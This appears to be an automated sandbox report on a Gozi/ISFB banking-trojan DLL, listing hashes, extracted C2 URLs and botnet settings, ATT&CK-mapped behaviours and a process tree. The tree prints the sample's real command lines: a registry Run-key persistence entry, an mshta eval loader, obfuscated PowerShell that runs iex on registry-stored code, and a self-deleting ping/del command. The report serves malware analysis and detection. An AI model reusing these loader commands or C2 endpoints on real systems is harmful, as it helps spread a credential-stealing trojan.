gozi | 894668791d06262dd16740235faa3b1672e2cb5cf171954f29abaca421c09265

Analysis

max time kernel
150s
max time network
90s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
04-07-2023 12:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b565aa423ca4ba6e8c6b208c22e5b056.dll
Size

585KB
MD5

b565aa423ca4ba6e8c6b208c22e5b056
SHA1

0f661ba97e702021988fa372fde43bd3165f1cfe
SHA256

894668791d06262dd16740235faa3b1672e2cb5cf171954f29abaca421c09265
SHA512

b426343c6e8fa54e892fdbf506f1865d89e134e25ff9552bfe2dea36e791a017380aa5220c1af08922e2619d49731f73889de2e6e2efc155c64f4f6f87d701dd
SSDEEP

6144:2Qs4GPx2zWaTL8pxi5mLgNKz+ODzKaDtdjokutIC54VQQkPBRm2mZOkjnEsWKsGs:Y4sQiMjNa+ODmsWDOWrK1idIGd

Score

10^/10

gozi 5050 banker isfb persistence trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

https://avas1ta.com/in/login/

itwicenice.com

Attributes

base_path
/jerry/
build
250259
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

https://avas1t.de/in/loginq/

itwicenice.com

Attributes

base_path
/pictures/
build
250259
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation mshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation	mshta.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FolderContact = "cmd /c start C:\\Users\\Admin\\FolderContact.lnk -ep unrestricted -file C:\\Users\\Admin\\StartMail.ps1"	Explorer.EXE

Suspicious use of SetThreadContext 7 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3380 set thread context of 3128	3380	powershell.exe	Explorer.EXE
PID 3128 set thread context of 3728	3128	Explorer.EXE	RuntimeBroker.exe
PID 3128 set thread context of 4648	3128	Explorer.EXE	cmd.exe
PID 3128 set thread context of 3948	3128	Explorer.EXE	RuntimeBroker.exe
PID 3128 set thread context of 4672	3128	Explorer.EXE	RuntimeBroker.exe
PID 4648 set thread context of 3092	4648	cmd.exe	PING.EXE
PID 3128 set thread context of 1664	3128	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3092 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

3092 PING.EXE

pid	process
3092	PING.EXE

pid	process
3092	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

regsvr32.exepowershell.exeExplorer.EXE

pid	process
3856	regsvr32.exe
3856	regsvr32.exe
3380	powershell.exe
3380	powershell.exe
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3128 Explorer.EXE
Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

3380 powershell.exe
3128 Explorer.EXE
3128 Explorer.EXE
3128 Explorer.EXE
3128 Explorer.EXE
4648 cmd.exe
3128 Explorer.EXE

pid	process
3128	Explorer.EXE

pid	process
3380	powershell.exe
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
4648	cmd.exe
3128	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	3380	powershell.exe
Token: SeShutdownPrivilege	3128	Explorer.EXE
Token: SeCreatePagefilePrivilege	3128	Explorer.EXE
Token: SeShutdownPrivilege	3128	Explorer.EXE
Token: SeCreatePagefilePrivilege	3128	Explorer.EXE
Token: SeShutdownPrivilege	3128	Explorer.EXE
Token: SeCreatePagefilePrivilege	3128	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3128 Explorer.EXE

pid	process
3128	Explorer.EXE

Suspicious use of WriteProcessMemory 45 IoCs

Processes:

regsvr32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 228 wrote to memory of 3856	228	regsvr32.exe	regsvr32.exe
PID 228 wrote to memory of 3856	228	regsvr32.exe	regsvr32.exe
PID 228 wrote to memory of 3856	228	regsvr32.exe	regsvr32.exe
PID 1184 wrote to memory of 3380	1184	mshta.exe	powershell.exe
PID 1184 wrote to memory of 3380	1184	mshta.exe	powershell.exe
PID 3380 wrote to memory of 1328	3380	powershell.exe	csc.exe
PID 3380 wrote to memory of 1328	3380	powershell.exe	csc.exe
PID 1328 wrote to memory of 4876	1328	csc.exe	cvtres.exe
PID 1328 wrote to memory of 4876	1328	csc.exe	cvtres.exe
PID 3380 wrote to memory of 2720	3380	powershell.exe	csc.exe
PID 3380 wrote to memory of 2720	3380	powershell.exe	csc.exe
PID 2720 wrote to memory of 2944	2720	csc.exe	cvtres.exe
PID 2720 wrote to memory of 2944	2720	csc.exe	cvtres.exe
PID 3380 wrote to memory of 3128	3380	powershell.exe	Explorer.EXE
PID 3380 wrote to memory of 3128	3380	powershell.exe	Explorer.EXE
PID 3380 wrote to memory of 3128	3380	powershell.exe	Explorer.EXE
PID 3380 wrote to memory of 3128	3380	powershell.exe	Explorer.EXE
PID 3128 wrote to memory of 3728	3128	Explorer.EXE	RuntimeBroker.exe
PID 3128 wrote to memory of 3728	3128	Explorer.EXE	RuntimeBroker.exe
PID 3128 wrote to memory of 4648	3128	Explorer.EXE	cmd.exe
PID 3128 wrote to memory of 4648	3128	Explorer.EXE	cmd.exe
PID 3128 wrote to memory of 4648	3128	Explorer.EXE	cmd.exe
PID 3128 wrote to memory of 3728	3128	Explorer.EXE	RuntimeBroker.exe
PID 3128 wrote to memory of 3728	3128	Explorer.EXE	RuntimeBroker.exe
PID 3128 wrote to memory of 3948	3128	Explorer.EXE	RuntimeBroker.exe
PID 3128 wrote to memory of 3948	3128	Explorer.EXE	RuntimeBroker.exe
PID 3128 wrote to memory of 4648	3128	Explorer.EXE	cmd.exe
PID 3128 wrote to memory of 3948	3128	Explorer.EXE	RuntimeBroker.exe
PID 3128 wrote to memory of 4648	3128	Explorer.EXE	cmd.exe
PID 3128 wrote to memory of 3948	3128	Explorer.EXE	RuntimeBroker.exe
PID 3128 wrote to memory of 4672	3128	Explorer.EXE	RuntimeBroker.exe
PID 3128 wrote to memory of 4672	3128	Explorer.EXE	RuntimeBroker.exe
PID 3128 wrote to memory of 4672	3128	Explorer.EXE	RuntimeBroker.exe
PID 3128 wrote to memory of 4672	3128	Explorer.EXE	RuntimeBroker.exe
PID 4648 wrote to memory of 3092	4648	cmd.exe	PING.EXE
PID 4648 wrote to memory of 3092	4648	cmd.exe	PING.EXE
PID 4648 wrote to memory of 3092	4648	cmd.exe	PING.EXE
PID 3128 wrote to memory of 1664	3128	Explorer.EXE	cmd.exe
PID 3128 wrote to memory of 1664	3128	Explorer.EXE	cmd.exe
PID 3128 wrote to memory of 1664	3128	Explorer.EXE	cmd.exe
PID 3128 wrote to memory of 1664	3128	Explorer.EXE	cmd.exe
PID 4648 wrote to memory of 3092	4648	cmd.exe	PING.EXE
PID 4648 wrote to memory of 3092	4648	cmd.exe	PING.EXE
PID 3128 wrote to memory of 1664	3128	Explorer.EXE	cmd.exe
PID 3128 wrote to memory of 1664	3128	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3128

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\b565aa423ca4ba6e8c6b208c22e5b056.dll
2⤵
- Suspicious use of WriteProcessMemory
PID:228

C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\b565aa423ca4ba6e8c6b208c22e5b056.dll
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3856

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>K4sd='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K4sd).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\62040AB2-5938-E445-F3B6-9D58D74A210C\\\StartMail'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name hlbhmsciy -value gp; new-alias -name yxlqre -value iex; yxlqre ([System.Text.Encoding]::ASCII.GetString((hlbhmsciy "HKCU:Software\AppDataLow\Software\Microsoft\62040AB2-5938-E445-F3B6-9D58D74A210C").MaskMemory))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3380

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bk1f5xac\bk1f5xac.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1328

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1F3.tmp" "c:\Users\Admin\AppData\Local\Temp\bk1f5xac\CSC434B44964C9A4503B27D13A587FB5718.TMP"
5⤵
PID:4876

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q1vbxorm\q1vbxorm.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2720

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2BE.tmp" "c:\Users\Admin\AppData\Local\Temp\q1vbxorm\CSC4875819A447C43AE8049A955C7E48C.TMP"
5⤵
PID:2944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\b565aa423ca4ba6e8c6b208c22e5b056.dll"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4648

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3092

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:1664

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3728

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3948

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4672

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESC1F3.tmp

Filesize
1KB

MD5
f5564923d545e09070a18c58d5e0db2c

SHA1
c4a4b00acd4148d7afa8930cd54256aad48a3d34

SHA256
366b84377e95a9239798064f40fe593e17b3482d2b6302aa7b6586d60e655996

SHA512
e2c09ab1ba01a5388b50036c364f7ab9a56788b966e371c2a20e3e3fba1f1b469f749fd76373e182cdfce6c3194787c7ababbfe0f661b67b4413204324f557f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC2BE.tmp

Filesize
1KB

MD5
c14e6836ada6ce6412019cf4fa1979d8

SHA1
d5a1b60b7587030791e98b0b94c06424427a049f

SHA256
0a88330bd3e56a1ba39d86d1875a2565245c9cdb165f51ed50e39b04f6eac829

SHA512
6e76d44c406b89e24ba25915af8b4c7635a694600d926deb3d60a2ccce9350d9e462681415a3955e0d67487f63637d3b2309b8ad53601dad87186d27785c0a7a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2fl5xtrj.gy2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bk1f5xac\bk1f5xac.dll

Filesize
3KB

MD5
c3b59cdc75e4c692a7d96a38bf79aeef

SHA1
8ef901292b9222ff67446902ef58297181eec22f

SHA256
d71df7d9f1a8389a2b10824d827311fd8e637988d1039f546116da7737cff5f3

SHA512
036e6d5892fdc629d9a6c7881dc0a2f075628b1fe085b0f121c0068276257065c3439d88eb5cec2fa5c00bc876b520200d154395c2a63cc5605764ce5e6ca9f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\q1vbxorm\q1vbxorm.dll

Filesize
3KB

MD5
b6f8b570d0ff95c014e2c936f4132e5c

SHA1
52b5d5f1ed878de89fc7a725c1df004cf1269bab

SHA256
403198ddb1b3e8e773fc319b21777ffd6ab41b308ebf0d100c3d6fe41e01c7a5

SHA512
7a7104bfb2cf705b2c53ffc7d10e1b9c42204741e0a8936763153eeb3bbdfe3e1b06816138daa1a9d86a3b8ed2e48c7bcdaa0d397fbf4e26c55cd99506da97e9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bk1f5xac\CSC434B44964C9A4503B27D13A587FB5718.TMP

Filesize
652B

MD5
69c05ae012c82823ee7d2629ede9d2ac

SHA1
8760465d6f9820a0a60535f5646d32d067452248

SHA256
4a73698361034ac779fc02dd6401309cebd7273b97c61cb348925c082627d60d

SHA512
8483a461cd08b21b217423a1dfacaf386030ed40302a7d950c2beb03dcb196496935cbf378c7d0aa722a36c60640e3b4992169ae22b5925bd39b088e6ab8570a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bk1f5xac\bk1f5xac.0.cs

Filesize
419B

MD5
6f9929170a31b4128137fa54d631bf2e

SHA1
77e54c09aacad9ec0fa5e09894a54066d5630c36

SHA256
88df79379c27a718e26a0ab4d3cf710c67b36a9b5fa155e044791710e59e3c3f

SHA512
22a8d34ecc787f6e30bdbda3d14bc578cf824a31eb31149b770a207f28eff877ae2d961aab13ce1cc99487536196d2a2b15acedbcdd4536db1bf87d60f265f76

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bk1f5xac\bk1f5xac.cmdline

Filesize
369B

MD5
0cbc6e639b26f39ce13001dd6be402bd

SHA1
422f64aaef5aafd12e3f174976790ad94d086fa0

SHA256
e33118d07d77484464e81d25e9881ff13aa6d8f54bd927a5ea32fde2e992d8bb

SHA512
572420dbeaad2d3765a55abd1c8dacf80d18c5da360aa9e3445e883b75a48869942acefa8d75388f5c898d3d6cd81eeddd044a8f7988b779704a0351bc56ba7f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q1vbxorm\CSC4875819A447C43AE8049A955C7E48C.TMP

Filesize
652B

MD5
588d85c3f6737f39821785ed495a5750

SHA1
f6c3bad0739e654d774a84169cf2ee572e4f7d4e

SHA256
529e5b4dd7d9ab066a26effc5f4037c7ca2903166145ab90bbaa27102072152b

SHA512
af7e4c651950515b781894418773454142b5f834c2e7ec7748e20a54ba8dbfe343b91069e18cb3698b481a1435cc36c412ee876938237e562f878b92ccae166f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q1vbxorm\q1vbxorm.0.cs

Filesize
412B

MD5
290e901d2ca9801a33ba1c2e1a28326a

SHA1
ffba41172744d79b40905e37d607f2a6a28e30cc

SHA256
6e9926b1981afd9dedfa73fd8f792ef11fc433073bfc8791be35fa4d802a86f5

SHA512
1077660f0ad43c5c69fee7576f70f04d017524eec8ddbb8f80cc7b0801df2ab3dac540cfdc08bb42e39c37caf215d7ca027f6deb2df924c1831382c5e4687b06

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q1vbxorm\q1vbxorm.cmdline

Filesize
369B

MD5
62fbb7d61572953a56c2aae19c96f4b7

SHA1
7b48536bc0aadefe68d65d574e3eca931f45b2e7

SHA256
40146cf8e6215534122fdab62fecba6091a15d891886c82f19f5b3043f34ff8f

SHA512
47ddaccd0d837750726b4e9ce902e981cdf0452e36a8ccb03ef665db59e248540c12cdea7601b76629c3fbafef987a747a02860dbc1e8a8a8d57910e12927258

Download Submit
memory/1664-220-0x0000000001270000-0x0000000001308000-memory.dmp

Filesize
608KB

Download
memory/1664-225-0x0000000001270000-0x0000000001308000-memory.dmp

Filesize
608KB

Download
memory/3092-218-0x0000028A5D320000-0x0000028A5D3C3000-memory.dmp

Filesize
652KB

Download
memory/3092-230-0x0000028A5D320000-0x0000028A5D3C3000-memory.dmp

Filesize
652KB

Download
memory/3092-229-0x0000028A5D1C0000-0x0000028A5D1C1000-memory.dmp

Filesize
4KB

Download
memory/3128-232-0x0000000008DB0000-0x0000000008E53000-memory.dmp

Filesize
652KB

Download
memory/3128-204-0x0000000000DC0000-0x0000000000DC1000-memory.dmp

Filesize
4KB

Download
memory/3128-209-0x0000000008DB0000-0x0000000008E53000-memory.dmp

Filesize
652KB

Download
memory/3128-181-0x0000000008DB0000-0x0000000008E53000-memory.dmp

Filesize
652KB

Download
memory/3380-186-0x0000012EEABF0000-0x0000012EEAC2C000-memory.dmp

Filesize
240KB

Download
memory/3380-152-0x0000012EE9E30000-0x0000012EE9E40000-memory.dmp

Filesize
64KB

Download
memory/3380-153-0x0000012EE9E30000-0x0000012EE9E40000-memory.dmp

Filesize
64KB

Download
memory/3380-151-0x0000012EE9E30000-0x0000012EE9E40000-memory.dmp

Filesize
64KB

Download
memory/3380-147-0x0000012EEA860000-0x0000012EEA882000-memory.dmp

Filesize
136KB

Download
memory/3728-233-0x000001DD45000000-0x000001DD450A3000-memory.dmp

Filesize
652KB

Download
memory/3728-192-0x000001DD45000000-0x000001DD450A3000-memory.dmp

Filesize
652KB

Download
memory/3728-196-0x000001DD427C0000-0x000001DD427C1000-memory.dmp

Filesize
4KB

Download
memory/3856-138-0x0000000000B70000-0x0000000000B7E000-memory.dmp

Filesize
56KB

Download
memory/3856-133-0x0000000001010000-0x000000000104F000-memory.dmp

Filesize
252KB

Download
memory/3856-135-0x0000000000BE0000-0x0000000000BED000-memory.dmp

Filesize
52KB

Download
memory/3856-134-0x0000000000B70000-0x0000000000B7E000-memory.dmp

Filesize
56KB

Download
memory/3856-226-0x0000000000B70000-0x0000000000B7E000-memory.dmp

Filesize
56KB

Download
memory/3948-234-0x000002A72EC20000-0x000002A72ECC3000-memory.dmp

Filesize
652KB

Download
memory/3948-227-0x000002A72EBE0000-0x000002A72EBE1000-memory.dmp

Filesize
4KB

Download
memory/3948-197-0x000002A72EC20000-0x000002A72ECC3000-memory.dmp

Filesize
652KB

Download
memory/4648-200-0x000001A74F740000-0x000001A74F741000-memory.dmp

Filesize
4KB

Download
memory/4648-198-0x000001A74F7A0000-0x000001A74F843000-memory.dmp

Filesize
652KB

Download
memory/4648-231-0x000001A74F7A0000-0x000001A74F843000-memory.dmp

Filesize
652KB

Download
memory/4672-211-0x0000029EBD040000-0x0000029EBD0E3000-memory.dmp

Filesize
652KB

Download
memory/4672-228-0x0000029EBC7E0000-0x0000029EBC7E1000-memory.dmp

Filesize
4KB

Download
memory/4672-212-0x0000029EBD040000-0x0000029EBD0E3000-memory.dmp

Filesize
652KB

Download
memory/4672-235-0x0000029EBD040000-0x0000029EBD0E3000-memory.dmp

Filesize
652KB

Download